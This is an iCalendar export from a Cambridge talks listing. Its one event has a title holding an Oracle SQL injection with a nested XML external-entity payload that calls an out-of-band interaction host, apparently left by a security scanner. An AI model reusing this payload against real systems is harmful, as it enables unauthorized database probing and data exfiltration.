BEGIN:VCALENDAR
VERSION:2.0
PRODID:-//Talks.cam//talks.cam.ac.uk//
X-WR-CALNAME:Talks.cam
BEGIN:VEVENT
SUMMARY:test'||(select extractvalue(xmltype('<?xml version="1.0" encoding=
 "UTF-8"?><!DOCTYPE root [ <!ENTITY % jlqmm SYSTEM "http://78dnytyzzexwdisd
 13l89ervamgg471v5jx6pue.oasti'||'fy.com/">%jlqmm\;]>')\,'/l') from dual)||
 ' - scott
DTSTART:20260416T110000Z
DTEND:20260416T130000Z
UID:TALK247910@talks.cam.ac.uk
CONTACT:1 Raven
DESCRIPTION:<p>test	</p>
LOCATION:tbc
END:VEVENT
END:VCALENDAR
